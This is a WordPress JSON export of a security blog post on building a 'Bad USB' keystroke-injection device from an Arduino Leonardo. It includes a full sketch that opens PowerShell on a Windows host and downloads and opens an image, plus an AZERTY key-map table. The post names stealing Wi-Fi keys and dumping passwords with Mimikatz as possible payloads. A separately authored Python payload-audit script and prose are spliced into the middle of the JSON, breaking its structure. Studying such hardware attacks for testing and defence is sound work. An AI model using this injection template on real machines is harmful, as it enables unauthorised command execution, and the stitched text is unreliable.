{"id":330,"date":"2018-05-30T22:43:07","date_gmt":"2018-05-30T20:43:07","guid":{"rendered":"http:\/\/pentester.blog\/?p=330"},"modified":"2019-08-18T19:47:25","modified_gmt":"2019-08-18T17:47:25","slug":"bad-usb-version-arduino","status":"publish","type":"post","link":"https:\/\/hacktarus.fr\/?p=330","title":{"rendered":"Bad USB, Arduino version"},"content":{"rendered":"<p>In the small world of \u201cBad USB\u201d devices, I wanted to try a version built on an Arduino board:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-331\" src=\"http:\/\/hacktarus.fr\/wp-content\/uploads\/2018\/05\/bad-usb.png\" alt=\"\" width=\"370\" height=\"142\" \/><\/p>\n<p>The basic principle is the same as for the famous Rubber Ducky: the USB key is really a USB HID (Human Interface Device), a keyboard, which, once the operating system has enumerated it, sends the sequence of keystrokes scripted by the attacker. No driver installation, no prompt, no confirmation: the host trusts any keyboard that shows up, and everything typed runs with the privileges of the user who is logged in.<\/p>\n<p>The script can be anything at all, from a simple Hello World to stealing Wi-Fi keys or dumping Windows passwords with Mimikatz.<\/p>\n<p>So how does this work in practice?<\/p>\n<p>You need the Arduino IDE; at the time of these tests I was using version 1.8.5.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-334\" src=\"http:\/\/hacktarus.fr\/wp-content\/uploads\/2018\/05\/arduino-1.png\" alt=\"\" width=\"635\" height=\"479\" \/><\/p>\n<p>Next, configure the IDE for an Arduino Leonardo board. The Leonardo's ATmega32U4 has native USB and can enumerate as a HID keyboard, which is what the Keyboard library relies on; a board without native USB (an Uno, for example) will not work with this library.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-335\" src=\"http:\/\/hacktarus.fr\/wp-content\/uploads\/2018\/05\/arduino-2.png\" alt=\"\" width=\"688\" height=\"387\" \/><\/p>\n<p>As for the script, nothing very complicated.<\/p>\n<p>Here is a small example for Windows whose purpose is to download an image from the Internet and display it on screen. The five-second wait at the start gives the host time to finish enumerating the device before the first keystroke; the other delays leave the Start menu search box and the PowerShell console time to appear, and you may need to lengthen them on a slow machine:<\/p>\n<pre>#include \"Keyboard.h\"\r\n\r\n\/\/ Press and release one key (used for Enter)\r\nvoid typeKey(int key)\r\n{\r\n  Keyboard.press(key);\r\n  delay(100);\r\n  Keyboard.release(key);\r\n}\r\n\r\n\/* Init function: runs once, as soon as the board is powered *\/\r\nvoid setup()\r\n{\r\n  \/\/ Begin the keyboard stream\r\n  Keyboard.begin();\r\n  \/\/ Wait 5 s for the host to finish enumerating the device\r\n  delay(5000);\r\n\r\n  \/\/ Windows key: opens the Start menu with its search box focused\r\n  Keyboard.press(KEY_LEFT_GUI);\r\n  Keyboard.releaseAll();\r\n\r\n  delay(200);\r\n  Keyboard.print(\"powershell\");\r\n  delay(1500);\r\n  typeKey(KEY_RETURN);\r\n  \/\/ Give the console time to open\r\n  delay(1000);\r\n  Keyboard.print(\"$client = new-object System.Net.WebClient\");\r\n  typeKey(KEY_RETURN);\r\n  delay(150);\r\n  \/\/ C:\/Temp must already exist: DownloadFile does not create folders\r\n  Keyboard.print(\"$client.DownloadFile('https:\/\/cdn.pixabay.com\/photo\/2018\/05\/07\/10\/48\/husky-3380548_960_720.jpg','C:\/Temp\/cat.jpg')\");\r\n  typeKey(KEY_RETURN);\r\n  delay(150);\r\n  Keyboard.print(\"gci -Path 'C:\/Temp\/' -Filter 'cat.jpg'\");\r\n  typeKey(KEY_RETURN);\r\n  delay(150);\r\n  \/\/ Open the picture with the default viewer, then close the console\r\n  Keyboard.print(\"ii 'C:\/Temp\/cat.jpg' ; exit \");\r\n  delay(150);\r\n  typeKey(KEY_RETURN);\r\n\r\n  \/\/ End the keyboard stream\r\n  Keyboard.end();\r\n}\r\n\r\n\/* Unused endless loop *\/\r\nvoid loop() {}\r\n<\/pre>\n<p>Then all that is left is to send, or rather upload, the sketch to the USB key:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-336\" src=\"http:\/\/hacktarus.fr\/wp-content\/uploads\/2018\/05\/arduino-3.png\" alt=\"\" width=\"458\" height=\"105\" \/><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-338\" 
src=\"http:\/\/hacktarus.fr\/wp-content\/uploads\/2018\/05\/arduino-4.png\" alt=\"\" width=\"1115\" height=\"141\" \/><\/p>\n<p>And that's it! The script fires by itself as soon as the key is plugged into an unlocked session (a bit like an autorun, although it has strictly nothing to do with one: nothing is executed from the device, the host simply receives keystrokes):<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-341\" src=\"http:\/\/hacktarus.fr\/wp-content\/uploads\/2018\/05\/arduino-powershell.png\" alt=\"\" width=\"961\" height=\"173\" \/><\/p>\n<p>And here is the result \ud83d\ude42<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-340\" src=\"http:\/\/hacktarus.fr\/wp-content\/uploads\/2018\/05\/arduino-ouput.png\" alt=\"\" width=\"825\" height=\"792\" \/><\/p>\n<p>One small problem I ran into: by default the key mapping is designed for a QWERTY keyboard... so, needless to say, the first time around the script typed gibberish. The library sends key positions (USB HID usage IDs), not characters; the host's keyboard layout decides which character each position produces, so on an AZERTY host the QWERTY table types the wrong characters.<\/p>\n<p>After a bit of digging I located the culprit: the Keyboard.cpp file of the Arduino Keyboard library. 
You can either adapt it yourself or find a ready-made AZERTY version online.<\/p>\n<p>The change is to the _asciimap table. Each entry is the USB HID usage ID of the key that produces that ASCII character, with the SHIFT bit (0x80) set when the key must be pressed together with Shift; Keyboard.press() indexes the table directly with the character code, so keep exactly 128 entries in ASCII order, one per line (a dropped entry shifts every character after it onto the wrong key). Below is a version for AZERTY keyboards. Two limits are worth knowing: this version of the library only knows about Shift, so characters that sit on AltGr on a French layout (#, @, [, ], the backslash, {, |, }, ~ and the backtick) cannot be produced, and the corresponding entries, marked TODO, currently type something else; and ^ is a dead key on AZERTY, so it only appears combined with or after the next keystroke. Keep your payload within the characters the table really supports.<\/p>\n<pre>const uint8_t _asciimap[128] =\r\n{\r\n\t0x00,          \/\/ NUL\r\n\t0x00,          \/\/ SOH\r\n\t0x00,          \/\/ STX\r\n\t0x00,          \/\/ ETX\r\n\t0x00,          \/\/ EOT\r\n\t0x00,          \/\/ ENQ\r\n\t0x00,          \/\/ ACK\r\n\t0x00,          \/\/ BEL\r\n\t0x2a,          \/\/ BS  Backspace\r\n\t0x2b,          \/\/ TAB Tab\r\n\t0x28,          \/\/ LF  Enter\r\n\t0x00,          \/\/ VT\r\n\t0x00,          \/\/ FF\r\n\t0x00,          \/\/ CR\r\n\t0x00,          \/\/ SO\r\n\t0x00,          \/\/ SI\r\n\t0x00,          \/\/ DLE\r\n\t0x00,          \/\/ DC1\r\n\t0x00,          \/\/ DC2\r\n\t0x00,          \/\/ DC3\r\n\t0x00,          \/\/ DC4\r\n\t0x00,          \/\/ NAK\r\n\t0x00,          \/\/ SYN\r\n\t0x00,          \/\/ ETB\r\n\t0x00,          \/\/ CAN\r\n\t0x00,          \/\/ EM\r\n\t0x00,          \/\/ SUB\r\n\t0x00,          \/\/ ESC\r\n\t0x00,          \/\/ FS\r\n\t0x00,          \/\/ GS\r\n\t0x00,          \/\/ RS\r\n\t0x00,          \/\/ US\r\n\r\n\t0x2c,          \/\/ ' '\r\n\t0x38,          \/\/ !\r\n\t0x20,          \/\/ \"\r\n\t0x20,          \/\/ # TODO: AltGr+3 on AZERTY, not reachable with SHIFT\r\n\t0x30,          \/\/ $\r\n\t0x34|SHIFT,    \/\/ %\r\n\t0x1e,          \/\/ &amp;\r\n\t0x21,          \/\/ '\r\n\t0x22,          \/\/ (\r\n\t0x2d,          \/\/ )\r\n\t0x31,          \/\/ *\r\n\t0x2e|SHIFT,    \/\/ +\r\n\t0x10,          \/\/ ,\r\n\t0x23,          \/\/ -\r\n\t0x36|SHIFT,    \/\/ .\r\n\t0x37|SHIFT,    \/\/ \/\r\n\t0x27|SHIFT,    \/\/ 0\r\n\t0x1e|SHIFT,    \/\/ 1\r\n\t0x1f|SHIFT,    \/\/ 2\r\n\t0x20|SHIFT,    \/\/ 3\r\n\t0x21|SHIFT,    \/\/ 4\r\n\t0x22|SHIFT,    \/\/ 5\r\n\t0x23|SHIFT,    \/\/ 6\r\n\t0x24|SHIFT,    \/\/ 7\r\n\t0x25|SHIFT,    \/\/ 8\r\n\t0x26|SHIFT,    \/\/ 9\r\n\t0x37,          \/\/ :\r\n\t0x36,          \/\/ ;\r\n\t0x64,          \/\/ &lt;\r\n\t0x2e,          \/\/ =\r\n\t0x64|SHIFT,    \/\/ &gt;\r\n\t0x10|SHIFT,    \/\/ ?\r\n\t0x1f,          \/\/ @ TODO: AltGr+0 on AZERTY\r\n\t0x14|SHIFT,    \/\/ A\r\n\t0x05|SHIFT,    \/\/ B\r\n\t0x06|SHIFT,    \/\/ C\r\n\t0x07|SHIFT,    \/\/ D\r\n\t0x08|SHIFT,    \/\/ E\r\n\t0x09|SHIFT,    \/\/ F\r\n\t0x0a|SHIFT,    \/\/ G\r\n\t0x0b|SHIFT,    \/\/ H\r\n\t0x0c|SHIFT,    \/\/ I\r\n\t0x0d|SHIFT,    \/\/ J\r\n\t0x0e|SHIFT,    \/\/ K\r\n\t0x0f|SHIFT,    \/\/ L\r\n\t0x33|SHIFT,    \/\/ M\r\n\t0x11|SHIFT,    \/\/ N\r\n\t0x12|SHIFT,    \/\/ O\r\n\t0x13|SHIFT,    \/\/ P\r\n\t0x04|SHIFT,    \/\/ Q\r\n\t0x15|SHIFT,    \/\/ R\r\n\t0x16|SHIFT,    \/\/ S\r\n\t0x17|SHIFT,    \/\/ T\r\n\t0x18|SHIFT,    \/\/ U\r\n\t0x19|SHIFT,    \/\/ V\r\n\t0x1d|SHIFT,    \/\/ W\r\n\t0x1b|SHIFT,    \/\/ X\r\n\t0x1c|SHIFT,    \/\/ Y\r\n\t0x1a|SHIFT,    \/\/ Z\r\n\t0x0c,          \/\/ [ TODO: AltGr+5 on AZERTY\r\n\t0x31,          \/\/ bslash TODO: AltGr+8 on AZERTY\r\n\t0x0d,          \/\/ ] TODO: AltGr+) on AZERTY\r\n\t0x2f,          \/\/ ^ dead key on AZERTY\r\n\t0x25,          \/\/ _\r\n\t0x35,          \/\/ ` TODO: AltGr+7 on AZERTY\r\n\t0x14,          \/\/ a\r\n\t0x05,          \/\/ b\r\n\t0x06,          \/\/ c\r\n\t0x07,          \/\/ d\r\n\t0x08,          \/\/ e\r\n\t0x09,          \/\/ f\r\n\t0x0a,          \/\/ g\r\n\t0x0b,          \/\/ h\r\n\t0x0c,          \/\/ i\r\n\t0x0d,          \/\/ j\r\n\t0x0e,          \/\/ k\r\n\t0x0f,          \/\/ l\r\n\t0x33,          \/\/ m\r\n\t0x11,          \/\/ n\r\n\t0x12,          \/\/ o\r\n\t0x13,          \/\/ p\r\n\t0x04,          \/\/ q\r\n\t0x15,          \/\/ r\r\n\t0x16,          \/\/ s\r\n\t0x17,          \/\/ t\r\n\t0x18,          \/\/ u\r\n\t0x19,          \/\/ v\r\n\t0x1d,          \/\/ w\r\n\t0x1b,          \/\/ x\r\n\t0x1c,          \/\/ y\r\n\t0x1a,          \/\/ z\r\n\t0x2f|SHIFT,    \/\/ { TODO: AltGr+4 on AZERTY\r\n\t0x31|SHIFT,    \/\/ | TODO: AltGr+6 on AZERTY\r\n\t0x30|SHIFT,    \/\/ } TODO: AltGr+= on AZERTY\r\n\t0x35|SHIFT,    \/\/ ~ TODO: AltGr+2 on AZERTY\r\n\t0              \/\/ DEL\r\n};<\/pre>\n<p>After that, let your imagination run free!<\/p>\n",
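Before flashing, it is worth checking that every character of a payload is one the table can really type. The Python script below is an added example, not code from the post or from the Arduino project: it re-implements the lookup Keyboard.press() does on _asciimap (table value, high bit meaning Left Shift, which is modifier 0x02 in the HID report) using the AZERTY table above, transcribed here with SHIFT folded into each value, and reports the characters that will not come out as written. Beyond what the post says, it assumes that usage 0x2f is the dead-key ^ on a French layout, and it hard-codes the set of characters that sit on AltGr on AZERTY (the table's TODO entries plus the backslash and {), which the Shift-only library cannot produce.

```python
"""Audit a BadUSB payload against an Arduino Keyboard.cpp _asciimap table.

Added example, not code from the post or the Arduino project. It re-implements
the lookup Keyboard.press() performs in the 2018 Arduino Keyboard library:
_asciimap maps each ASCII code to a USB HID usage ID, and the high bit (SHIFT,
0x80) means "hold Left Shift", i.e. modifier bit 0x02 in the HID report. The
table is the AZERTY _asciimap from the post, transcribed with SHIFT folded in.
"""
SHIFT = 0x80
MOD_LEFT_SHIFT = 0x02

# Characters that sit on AltGr on a French AZERTY layout. The library only
# knows Shift, so _asciimap cannot express them; the post's table parks them on
# other keys and marks most of them TODO.
ALTGR_ON_AZERTY = set("#@[\\]`{|}~")

# Assumption about the host layout: usage 0x2f is the dead-key ^, so the
# character only shows up once the next key is typed.
DEAD_KEYS = {"^"}

AZERTY_ASCIIMAP = [
    # 0x00-0x1f: control codes, only BS, TAB and LF map to a key
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2a, 0x2b, 0x28, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    # 0x20-0x2f: space ! " # $ % & ' ( ) * + , - . /
    0x2c, 0x38, 0x20, 0x20, 0x30, 0xb4, 0x1e, 0x21, 0x22, 0x2d, 0x31, 0xae, 0x10, 0x23, 0xb6, 0xb7,
    # 0x30-0x3f: 0-9 : ; < = > ?
    0xa7, 0x9e, 0x9f, 0xa0, 0xa1, 0xa2, 0xa3, 0xa4, 0xa5, 0xa6, 0x37, 0x36, 0x64, 0x2e, 0xe4, 0x90,
    # 0x40-0x4f: @ A-O
    0x1f, 0x94, 0x85, 0x86, 0x87, 0x88, 0x89, 0x8a, 0x8b, 0x8c, 0x8d, 0x8e, 0x8f, 0xb3, 0x91, 0x92,
    # 0x50-0x5f: P-Z [ \ ] ^ _
    0x93, 0x84, 0x95, 0x96, 0x97, 0x98, 0x99, 0x9d, 0x9b, 0x9c, 0x9a, 0x0c, 0x31, 0x0d, 0x2f, 0x25,
    # 0x60-0x6f: ` a-o
    0x35, 0x14, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x33, 0x11, 0x12,
    # 0x70-0x7f: p-z { | } ~ DEL
    0x13, 0x04, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1d, 0x1b, 0x1c, 0x1a, 0xaf, 0xb1, 0xb0, 0xb5, 0x00,
]


def hid_report(ch, table=AZERTY_ASCIIMAP):
    """(modifier, usage) for one character as Keyboard.press() builds it, or
    None when the table has no key for it (the library raises a write error)."""
    code = ord(ch)
    if code > 0x7F:
        return None
    value = table[code]
    if value == 0:
        return None
    return (MOD_LEFT_SHIFT if value & SHIFT else 0, value & 0x7F)


def encode(payload, table=AZERTY_ASCIIMAP):
    """Key presses the Leonardo sends for Keyboard.print(payload)."""
    return [hid_report(ch, table) for ch in payload]


def shared_keys(table=AZERTY_ASCIIMAP):
    """For each printable character, the other characters parked on the same
    (modifier, usage): only one of them can really come out of that key."""
    by_press = {}
    for code in range(0x20, 0x7F):
        if table[code]:
            by_press.setdefault(table[code], []).append(chr(code))
    return {c: [o for o in group if o != c]
            for group in by_press.values() if len(group) > 1 for c in group}


def audit(payload, table=AZERTY_ASCIIMAP):
    """Characters of payload that will not be typed as written, with the reason."""
    shared = shared_keys(table)
    problems = {}
    for ch in sorted(set(payload)):
        if hid_report(ch, table) is None:
            problems[ch] = "no key in table"
        elif ch in ALTGR_ON_AZERTY:
            problems[ch] = "needs AltGr, not reachable with SHIFT only"
        elif ch in DEAD_KEYS:
            problems[ch] = "dead key on this layout"
        elif ch in shared:
            # Sharing a key with an AltGr placeholder is expected; sharing with
            # anything else means the table was edited wrongly.
            others = [o for o in shared[ch] if o not in ALTGR_ON_AZERTY]
            if others:
                problems[ch] = "shares a key with " + ", ".join(map(repr, others))
    return problems


if __name__ == "__main__":
    # Constructed payloads: the post's two PowerShell lines, then one that uses
    # characters the AZERTY table cannot produce.
    for line in ("$client = new-object System.Net.WebClient",
                 "ii 'C:/Temp/cat.jpg' ; exit",
                 "Invoke-WebRequest http://example.invalid/a#b | ii [x]"):
        print(f"{line!r}: {audit(line) or 'OK'}")
```

Run as-is, the script audits the two PowerShell lines of the sketch, which pass, and a third constructed line, where it names #, |, [ and ] as unreachable. The last branch of audit(), the shared-key check, is the one that catches an editing slip such as copying the same usage ID onto two lines of the table.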
"protected":false},"excerpt":{"rendered":"<p>In the small world of \u201cBad USB\u201d devices, I wanted to try a version built on an Arduino board: The basic principle is the same as for the famous Rubber Ducky: the USB key is really a USB HID (Human Interface Device), a keyboard, which, once the operating system has &hellip; <a href=\"https:\/\/hacktarus.fr\/?p=330\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">Bad USB, Arduino version<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":["post-330","post","type-post","status-publish","format-standard","hentry","category-usb"],"_links":{"self":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/330","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=330"}],"version-history":[{"count":7,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/330\/revisions"}],"predecessor-version":[{"id":346,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/330\/revisions\/346"}],"wp:attachment":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=330"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=330"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=330"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}